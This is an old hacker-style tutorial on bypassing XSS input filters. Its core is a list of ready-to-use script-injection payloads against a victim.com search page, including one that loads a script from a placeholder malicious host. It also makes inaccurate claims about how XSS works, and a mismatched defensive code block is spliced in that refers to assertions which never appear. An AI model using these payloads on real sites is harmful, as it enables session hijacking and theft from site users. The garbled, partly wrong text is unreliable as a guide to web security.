
/*Cross Site Scripting filtration Bypass

Arham Muhammad
rko.thelegendkiller@gmail.com */
________________________________________________________________________________
_1
Introduction To XSS (Cross-Site Scripting):
'Cross-Site Scripting', also known as 'XSS' for short, is a kind of vulnerability that exists in both web applications and OS-based applications, but in most cases in web applications. You might be wondering why it's known as 'XSS' and not 'CSS', referring to the full form. Well, 'CSS' is already the reserved abbreviation for 'Cascading Style Sheets'. It allows malicious code to be executed on a vulnerable server, most probably for session hijacking to gain administrator privileges. XSS depends entirely on cookies and sessions, and 'cookies' are known as the backbone of the Cross-Site Scripting vulnerability.
_2
Brief Description Of The Paper:
The paper is based on bypassing the filtration of a common web application security hole known as XSS (Cross-Site Scripting). XSS, being a common hole, is winning the attention of webmasters, who are concerned about the after-effects and the danger that can be exploited through a possible XSS hole. Because of this, most webmasters are patching, or actually it can be said they are filtering and sanitizing, commonly known XSS injection strings to deny a malicious input or request and so overcome XSS holes. These people think it's enough to filter some commonly known strings and boom, that's it, but it is not correct to say that you have 'filtered' the holes with just some commonly known characters.
________________________________________________________________________________
_3
Common XSS Strings To Inject:
Basically, JavaScript and HTML, and in some cases VBScript, are injected through an XSS vulnerability in a particular server. PHP can't be injected since it's server-side and is executed at that very moment. Thus we will first analyse some common XSS strings to inject.
1{ <html><font color="Red"><b>Pwned</b></font></html>
This is a basic HTML injection; if you are able to execute it on a vulnerable server you will see the message 'Pwned' somewhere on the vulnerable site.
2{ <script>alert('xss')</script>
This is a basic JavaScript injection which will display a pop-up box with the message 'xss' on it.
3{ "><script>alert('xss')</script>
This is a secondary JavaScript injection against the vulnerable server, which is also patched on most servers since it is a common string.
________________________________________________________________________________
_4
XSS Filtration Pattern And Overcoming It:
Webmasters mostly filter common strings in JavaScript to prevent hijacking, which means a guaranteed bypass on the server, since JavaScript is client-side and once the page is saved and altered, the hacker comes onto the scene! We will now examine the filtration pattern in JavaScript.
-----------------------------------------------------
<script language="JavaScript"><!--
// Client-side filter: walks every field of the first form and rejects the
// submission if the blacklist would have changed the field's value.
function denyxssreplacestring()
{
  var elements = document.forms[0].elements;
  for (var i = 0; i < elements.length; i++)
  {
    if (elements[i].value != malstring(elements[i].value))
    {
      alert("Cross-Site Scripting Attempt!");
      return (false);
    }
  }
  return (true);
}
// Blacklist: strips '<', '>' and '+' from the input and nothing else.
function malstring(string) {
  string = string.replace(/\</g,"");
  string = string.replace(/\>/g,"");
  string = string.replace(/\+/g,"");
  return (string);
}
//--></script>
-----------------------------------------------------
Now we see that the JavaScript is sanitizing the user's input while keeping in view the length of the string: if the input exceeds the length or contains any malicious string, it aborts the request, excluding unsanitized strings, removes the string and generates an alert message.
How simple: if we just save the page with the XSS filtration, alter it to remove the JavaScript, save again and inject some ~censored~, bump! it works!
Now you might be wondering that if we alter the page, then save and inject, it's of no use, since the server-side work is finished, but you are wrong!
Let's take the example of a search form:
--------------------------------------
<FORM ACTION="search.php" METHOD="GET">
<INPUT TYPE="Hidden" NAME="search" VALUE="">
</FORM>
--------------------------------------
Now we see the server is handling a 'GET' request, which means our altered page will work for sure, since it's sending a GET request to 'search.php' without any filtration, and wow! what we have here is a nice old vulnerable server on which to hijack sessions or exploit some other way!
_5
Bypassing Simple XSS Filtration Without Alteration:
Now we notice that the above script we used for filtration covers only a few strings, while there are a bunch of other ways and strings to inject a malicious request. It's only filtering '< > /', which leaves hackers a vast number of other strings with which to inject malicious code.
Now the question is: since '<' and '>' are filtered, how will we be able to send a JavaScript or HTML code injection? Well, the answer is quite easy: JavaScript can be executed using ' and " before the original script.
For instance,
')alert('xss');
This will generate an alert box again on a vulnerable server.
Secondly,
");alert('xss');
This too will generate an alert box on a vulnerable server.
________________________________________________________________________________
_6
Bypassing Advanced XSS Filtration:
Some webmasters filter a lot more than this, especially on important sites like gov and org sites. But it all depends on their pattern: if they are doing this in JavaScript, we will of course just alter the page, but what if the filtration is not in JavaScript but in HTML or PHP or even ASP? There's nothing impossible; we will try to get as much information about the filtration as we can.
Suppose a server has filtered all strings a bit more than the common ones, in a way that it reads the malicious string at the beginning or at the end in order to avoid and abort it; this of course can be bypassed too!
An example can likely be so:
helloworld<script>alert('xss')</script>
The above script will bypass filtration on a server that reads the malicious string at the beginning.
helloworld<script>alert('xss')<script>helloworld
This will bypass filtration on a server that reads at the beginning, at the end, or at both ends!
Mostly, this kind of filtration isn't common, so it can't be of much use!
Some webmasters also filter the word 'xss', so it's advisable to use some other message for the alert.
<script>alert('hello world')</script>
This will bypass message filtration.
Now we will study some more advanced filtration bypasses. Some webmasters simply define a pattern of a cross-site scripting script that is possibly common. In this case, I will mention here the full array of strings to inject, bypassing the filtration. We will suppose injecting into a search form.
victim.com/search.php?query="><script>alert('hello world')</script>
victim.com/search.php?query="><script>alert("hello world")</script>
victim.com/search.php?query="><script>alert("hello world");</script>
victim.com/search.php?query="><script>alert(/hello world");</script>
victim.com/search.php?query=//"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc<script>alert(/hello world/);</script>
victim.com/search.php?query=abc"><script>alert(/hello world/);</script>
victim.com/search.php?query=abc"></script><script>alert(/hello world/);</script>
victim.com/search.php?query=abc//abc"></script>alert(/hello world/);</script>
victim.com/search.php?query=000"><script></script><script>alert(1337);</script>
victim.com/search.php?query=000abc</script><script>alert(/1337/);</script>
victim.com/search.php?query=--<script>"></script>alert(/1337/);</script>
victim.com/search.php?query=pwned<script>document.write('abc');</script>
victim.com/search.php?query=pwned</script><script>document.write(1337);</script>
victim.com/search.php?query=pwned')alert(1337);//
victim.com/search.php?query=pwned";)alert(1337);//
victim.com/search.php?query=pwned");alert(/pwned/);//
victim.com/search.php?query=pwned//"></script><script>location.href='javascript:alert(/pwned/);</script>
victim.com/search.php?query="><img src='javascript:alert('xss');'>
victim.com/search.php?query="><script src='http://malicous js'</script>
--------------------------------------------------------------------------------
These are some of the advanced arrays of JavaScript code injection on a vulnerable server through XSS. This covers quite an advanced range, bypassing filtration patterns from alpha to numeric and alphanumeric, overcoming a filter on the word 'alert' with the 'document.write' and 'location.href' functionality, and of course you can add a lot to it as long as you know exactly what you are doing :p, overcoming both simple and advanced filtration patterns, giving a 99% chance to succeed in all aspects!
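An added example (not from the paper) that reproduces the paper's malstring() blacklist and a start/end-anchored check of the kind section 6 describes, runs them against inputs constructed from the paper's own payload list, and contrasts them with contextual output encoding, which is what the server must apply regardless of any client-side filter like the one in section 4. The function and constant names (anchoredCheck, escapeHtml, escapeJsString, PAYLOADS) are this example's own.

```javascript
// Added example: blacklist filtering from the paper beside contextual output
// encoding. All inputs below are constructed from the paper's payload list.

// The paper's blacklist filter: strips '<', '>' and '+' and nothing else.
function malstring(s) {
  return s.replace(/</g, "").replace(/>/g, "").replace(/\+/g, "");
}

// A check of the kind section 6 describes: it only inspects the very start or
// very end of the input, so anything padded on either side is never examined.
function anchoredCheck(s) {
  return /^<script>|<\/script>$/i.test(s);
}

// Defensive alternative: encode for the HTML context the value is reflected
// into (element body or quoted attribute) instead of blacklisting characters.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;", "/": "&#x2F;" };
  return s.replace(/[&<>"'\/]/g, (c) => map[c]);
}

// Encode for a JavaScript string-literal context (var q = '...'): every
// character outside [A-Za-z0-9 ] becomes \xHH (or \uHHHH), so quotes,
// parentheses and semicolons can no longer close the literal.
function escapeJsString(s) {
  return s.replace(/[^A-Za-z0-9 ]/g, (c) => {
    const h = c.charCodeAt(0).toString(16);
    return h.length <= 2 ? "\\x" + h.padStart(2, "0") : "\\u" + h.padStart(4, "0");
  });
}

// True when the blacklist saw nothing to remove, i.e. the input went through
// the filter unchanged (the section 5 case).
function blacklistPassesUnchanged(s) {
  return malstring(s) === s;
}

// Constructed inputs taken from the paper's sections 5 and 6.
const PAYLOADS = {
  quoteBreak: "');alert('xss');",
  padded: "helloworld<script>alert('xss')</script>helloworld",
  attrBreak: '"><script>alert(\'hello world\')</script>',
};
```

Run the assertions below to see that the blacklist passes the quote break-out untouched and the anchored check misses the padded payload, while the encoded forms contain no character that can leave their context.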
________________________________________________________________________________
Conclusion:
The paper is based on bypassing both simple and advanced filtration patterns and gaining infinite advantages!
I wrote this article as "Cross-Site Scripting" is among my interests, and this paper is for educational purposes only!
I don't hold any responsibility for any misuse or real-time exploitation from this paper!
________________________________________________________________________________
/ Shouts And Greets To: str0ke, USMAN, tushy, Hackman, shubham, Fix and all my friends!
